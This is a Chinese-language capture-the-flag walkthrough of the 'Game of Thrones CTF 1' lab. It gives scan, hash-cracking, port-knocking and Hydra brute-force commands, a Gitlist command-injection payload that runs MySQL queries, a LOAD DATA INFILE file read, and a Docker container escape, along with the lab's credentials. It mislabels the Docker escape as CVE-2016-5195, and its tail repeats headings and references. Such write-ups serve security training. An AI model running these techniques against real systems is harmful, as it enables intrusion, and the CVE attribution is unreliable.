Game of Thrones CTF 1 靶机完全攻略<\/h1>

0x00 靶机说明<\/h2>
使用nmap进行Ping扫描确定靶机IP:<\/p>
nmap -sn 192.168.50.0\/22
<\/span><\/span><\/code><\/pre>发现靶机IP为192.168.50.215<\/p>
<\/li>

全面扫描:<\/p>
nmap -p 1-65535 -T4 -A -v 192.168.50.215
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
Web服务分析<\/h3>


访问80端口网站，查看robots.txt发现三个路径:<\/p>

\/the-tree\/<\/li>
\/secret-island\/<\/li>
\/direct-access-to-kings-landing\/<\/li>
<\/ul>
<\/li>

在secret-island中发现游戏地图，记录了7个主要任务、3个秘密flag和最终目标<\/p>
<\/li>

修改User-Agent头获取提示:<\/p>
User-Agent: Three-eyed-raven
<\/span><\/span><\/span><\/code><\/pre>返回三条重要线索:<\/p>

进入Dorne需要身份为oberynmartell<\/li>
记住数字"3487 64535 12345"，用于与"POLITE people"交互<\/li>
"野蛮人从未越过长城"，需要在越墙前寻找他们<\/li>
<\/ul>
<\/li>

发现raven.php页面，提示关注音乐文件<\/p>
<\/li>
<\/ol>
第一个秘密flag<\/h3>

下载网站背景音乐<\/li>
使用exiftool查看音乐文件信息:
exiftool music_file.mp3
<\/span><\/span><\/code><\/pre><\/li>
获得第一个秘密flag:
8bf8854bebe108183caeb845c7676ae4
<\/code><\/pre>
<\/li>
<\/ol>
0x02 多恩王国(FTP)<\/h2>


发现FTP服务(21端口)，banner显示"Sand Snakes"<\/p>
<\/li>

使用三眼乌鸦提示的身份和密码登录:<\/p>

用户名: oberynmartell<\/li>
密码: A_verySmallManCanCastAVeryLargeShad0w<\/li>
<\/ul>
<\/li>

登录FTP后找到第一个flag文件<\/p>
<\/li>
<\/ol>
0x03 北境王国(Web)<\/h2>


在FTP中发现problems_in_the_north.txt，包含加密密码:<\/p>
nobody:6000e084bf18c302eae4559d48cb520c$2hY68a
<\/code><\/pre>
<\/li>

加密方式为: md5(md5($salt).$pass)<\/code><\/p>

使用hashcat-legacy(2.00版本)破解<\/li>
将"$"改为":"符合hashcat格式<\/li>
<\/ul>
<\/li>

破解得到密码: stark<\/p>
<\/li>

使用mcrypt解密(密码为上面解密的MD5):<\/p>
mcrypt -d file -k password
<\/span><\/span><\/code><\/pre><\/li>

修改hosts文件添加Winterfell域名解析<\/p>
<\/li>

访问Winterfell网站，查看源代码获得第二个flag<\/p>
<\/li>
<\/ol>
0x04 铁群岛(DNS)<\/h2>


分析盾徽图片，使用文本编辑器打开发现隐写信息:<\/p>
"Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress"
<\/code><\/pre>
<\/li>

查询DNS TXT记录:<\/p>
nslookup -qt=<\/span>txt target_domain
<\/span><\/span><\/code><\/pre><\/li>

获得第三个flag<\/p>
<\/li>
<\/ol>
0x05 风暴地(Web管理界面)<\/h2>


访问端口10000的Web管理界面<\/p>
<\/li>

使用凭证登录:<\/p>

用户名: aryastark<\/li>
密码: N3ddl3_1s_a_g00d_sword#!<\/li>
<\/ul>
<\/li>

使用Java小程序搜索flag.txt文件<\/p>

注意: 可能需要使用IE浏览器并添加例外<\/li>
<\/ul>
<\/li>

获得flag<\/p>
<\/li>
<\/ol>
0x06 山谷王国(PostgreSQL)<\/h2>


使用nmap发现的PostgreSQL服务(5432端口)<\/p>
<\/li>

登录数据库:<\/p>
psql -U user_name -d database_name -h serverhost
<\/span><\/span><\/code><\/pre><\/li>

查询aryas_kill_list表(死亡笔记)<\/p>
<\/li>

查询braavos_book表，发现ROT16加密信息:<\/p>
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
<\/code><\/pre>
<\/li>

尝试死亡笔记中的用户名，发现有效用户:<\/p>

用户名: TheRedWomanMelisandre<\/li>
密码: ValarMorghulis<\/li>
<\/ul>
<\/li>

获得秘密flag:<\/p>
3f82c41a70a8b0cfec9052252d9fd721
<\/code><\/pre>
<\/li>
<\/ol>
0x07 河湾王国(IMAP)<\/h2>


使用三眼乌鸦提示的数字"3487 64535 12345"进行端口敲门<\/p>
<\/li>

使用knock工具敲门:<\/p>
knock target_ip 3487<\/span> 64535<\/span> 12345<\/span>
<\/span><\/span><\/code><\/pre><\/li>

敲门后143端口(IMAP)开放<\/p>
<\/li>

使用nc连接IMAP服务:<\/p>
nc target_ip 143<\/span>
<\/span><\/span><\/code><\/pre><\/li>

IMAP命令操作:<\/p>
a login olennatyrell@7kingdoms.ctf H1gh.Gard3n.powah
a list "" *
a select INBOX
a fetch 1 full
<\/code><\/pre>
<\/li>

获得flag和下一站凭证:<\/p>
aee750c2009723355e2ac57564f9c3db
用户名: TywinLannister
密码: LannisterN3verDie!
<\/code><\/pre>
<\/li>
<\/ol>
0x08 凯岩王国与君临(Gitlist\/MySQL)<\/h2>


访问1337端口的Gitlist服务<\/p>
<\/li>

发现Gitlist远程代码执行漏洞:<\/p>
http:\/\/target_ip:1337\/repo\/blob\/master\/"a"`command`
<\/code><\/pre>
<\/li>

利用漏洞查询MySQL:<\/p>
"a"`mysql -h target_ip -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding --execute="show tables;"`
<\/code><\/pre>
<\/li>

查询iron_throne表获得摩斯密码<\/p>
<\/li>

翻译摩斯密码得到路径: \/ETC\/MYSQL\/FLAG<\/p>
<\/li>

创建临时表并导入flag文件内容:<\/p>
CREATE TABLE test (flag TEXT);
LOAD data INFILE '\/etc\/mysql\/flag' INTO TABLE test;
SELECT * from test;
<\/code><\/pre>
<\/li>

获得SSH凭证:<\/p>
用户名: daenerystargaryen
密码: .Dracarys4thewin.
<\/code><\/pre>
<\/li>
<\/ol>
0x09 最终决战(SSH\/Docker提权)<\/h2>


SSH登录:<\/p>
ssh daenerystargaryen@target_ip
<\/span><\/span><\/code><\/pre><\/li>

发现digger.txt字典文件，用于暴力破解<\/p>
<\/li>

设置SSH隧道:<\/p>
ssh daenerystargaryen@target_ip -L 12345:172.25.0.2:22 -N
<\/span><\/span><\/code><\/pre><\/li>

使用Hydra暴力破解root密码:<\/p>
hydra -l root -P digger.txt ssh:\/\/localhost:12345
<\/span><\/span><\/code><\/pre>获得密码: Dr4g0nGl4ss!<\/p>
<\/li>

SSH登录内部Docker系统:<\/p>
ssh root@localhost -p 12345<\/span>
<\/span><\/span><\/code><\/pre><\/li>

发现第三个秘密flag:<\/p>
a8db1d82db78ed452ba0882fb9554fc9
<\/code><\/pre>
<\/li>

使用branstark账户登录:<\/p>
用户名: branstark
密码: Th3_Thr33_Ey3d_Raven
<\/code><\/pre>
<\/li>

利用Docker提权漏洞(CVE-2016-5195):<\/p>

使用Metasploit的exploit\/linux\/local\/docker_privileged_container_escape模块<\/li>
<\/ul>
<\/li>

提权后找到checkpoint.7z文件<\/p>
<\/li>

组合三个秘密flag的最后10位生成密码:<\/p>
str1=<\/span>"8bf8854bebe108183caeb845c7676ae4"<\/span>
<\/span><\/span>str2=<\/span>"3f82c41a70a8b0cfec9052252d9fd721"<\/span>
<\/span><\/span>str3=<\/span>"a8db1d82db78ed452ba0882fb9554fc9"<\/span>
<\/span><\/span>password =<\/span> str1[-<\/span>10<\/span>:] +<\/span> str2[-<\/span>10<\/span>:] +<\/span> str3[-<\/span>10<\/span>:]
<\/span><\/span><\/code><\/pre>密码: 45c7676ae4252d9fd7212fb9554fc9<\/code><\/p>
<\/li>

解压checkpoint.7z获得最终flag:<\/p>
8e63dcd86ef9574181a9b6184ed3dde5
<\/code><\/pre>
<\/li>
<\/ol>
0x0A 总结<\/h2>


所有flag汇总:<\/p>

7个主要flag<\/li>
3个秘密flag<\/li>
最终flag<\/li>
<\/ul>
<\/li>

破解所有MD5 flag可组合成完整信息<\/p>
<\/li>

靶机设计特点:<\/p>

高度还原《权力的游戏》场景<\/li>
每个环节都有明确提示<\/li>
涵盖多种渗透测试技术<\/li>
<\/ul>
<\/li>
<\/ol>
参考资料<\/h2>

http:\/\/k3ramas.blogspot.com\/2017\/11\/game-of-thrones-ctf-1-walkthrough_1.html<\/li>
https:\/\/blog.vonhewitt.com\/2017\/11\/game-thrones-ctf-1-vulnhub-writeup<\/li>
https:\/\/github.com\/OscarAkaElvis\/game-of-thrones-hacking-ctf<\/li>
<\/ol>
Game of Thrones CTF 1 靶机完全攻略<\/h1>

0x01 信息收集<\/h2>

参考资料<\/h2> http:\/\/k3ramas.blogspot.com\/2017\/11\/game-of-thrones-ctf-1-walkthrough_1.html<\/li> https:\/\/blog.vonhewitt.com\/2017\/11\/game-thrones-ctf-1-vulnhub-writeup<\/li> https:\/\/github.com\/OscarAkaElvis\/game-of-thrones-hacking-ctf<\/li> <\/ol>

参考资料<\/h2>

http:\/\/k3ramas.blogspot.com\/2017\/11\/game-of-thrones-ctf-1-walkthrough_1.html<\/li>
https:\/\/blog.vonhewitt.com\/2017\/11\/game-thrones-ctf-1-vulnhub-writeup<\/li>
https:\/\/github.com\/OscarAkaElvis\/game-of-thrones-hacking-ctf<\/li> <\/ol>
